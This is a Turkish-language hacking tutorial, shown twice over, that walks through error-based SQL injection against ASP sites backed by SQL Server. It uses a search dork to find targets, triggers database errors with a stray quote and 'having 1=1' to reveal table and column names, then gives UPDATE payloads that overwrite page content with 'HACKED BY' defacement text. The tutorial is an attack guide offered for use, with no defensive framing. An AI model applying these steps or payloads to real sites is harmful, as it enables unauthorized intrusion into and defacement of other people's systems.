Asp Sitelerde Gecerlidir
Arama Kodumuz inurl:Asp?id=
İlk Önce Sitemizi Açıyoruz
Site Sonuna " 'a " Yaparak Hata Vermesini Sağlıyoruz Alttaki Resimdeki Hatayı Alırsak Tamamdır
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string 'a'.
/abstract.asp, line 67
Site Sonuna Rakamdan Sonra "having 1=1" Sorgusunu Verdirip Kolon Ve Tablo Adlarına Ulasmak İstiyoruz
Column 'b2bcats.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
'b2bcats.id' b2bcats tablo adı , id ise kolon adıdır
group by id yazarak diğer kolon isimlerine gidiyoruz işimize yarayan kolon adını bulana kadar devam ediyoruz
cıkan sonucları "," virgül koya rrak ulaşmak istediğimiz kolon adına kadar yapıyoruz
alttaki resimde text1 kolon adına ulastım
uptade injection komutumuz ;
+update+tabloadı+set+kolonadı='<h1>HACKED BY SADIZT</h1>';--
Yukarda ;
tablo adına: b2bcats
kolon adına :text1
+update+b2bcats+set+text1='<h1>hacked by Tul2K Feat SHT(Hacked)</h1>';--
Son Olarak Satır Sutununa Ekleyip Upload Ediyoruz
we SİTe HACked :yaho1
Arama Kodumuz inurl:Asp?id=
İlk Önce Sitemizi Açıyoruz
Site Sonuna " 'a " Yaparak Hata Vermesini Sağlıyoruz Alttaki Resimdeki Hatayı Alırsak Tamamdır
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string 'a'.
/abstract.asp, line 67
Site Sonuna Rakamdan Sonra "having 1=1" Sorgusunu Verdirip Kolon Ve Tablo Adlarına Ulasmak İstiyoruz
Column 'b2bcats.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
'b2bcats.id' b2bcats tablo adı , id ise kolon adıdır
group by id yazarak diğer kolon isimlerine gidiyoruz işimize yarayan kolon adını bulana kadar devam ediyoruz
cıkan sonucları "," virgül koya rrak ulaşmak istediğimiz kolon adına kadar yapıyoruz
alttaki resimde text1 kolon adına ulastım
uptade injection komutumuz ;
+update+tabloadı+set+kolonadı='<h1>HACKED BY SADIZT</h1>';--
Yukarda ;
tablo adına: b2bcats
kolon adına :text1
+update+b2bcats+set+text1='<h1>hacked by Tul2K Feat SHT(Hacked)</h1>';--
Son Olarak Satır Sutununa Ekleyip Upload Ediyoruz
we SİTe HACked :yaho1